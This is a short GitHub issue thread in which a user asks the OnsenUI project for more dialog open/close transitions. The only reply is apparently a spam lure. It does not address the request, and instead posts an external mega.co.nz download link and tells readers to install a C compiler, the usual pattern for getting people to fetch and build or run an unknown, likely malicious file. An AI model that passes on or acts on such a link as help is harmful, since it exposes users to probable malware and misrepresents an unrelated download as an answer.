### ISSUE TITLE
Feature Request: More dialog transitions

### ISSUE THREAD

**Issue by theonlyasdk** [OnsenUI/OnsenUI#3081]
It would be nice if there were to be more dialog open/close transitions like there are page transitions (like popping, fade, slide from a specified direction, etc)

**Comment by nhatlaso1** [comment]
try this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)
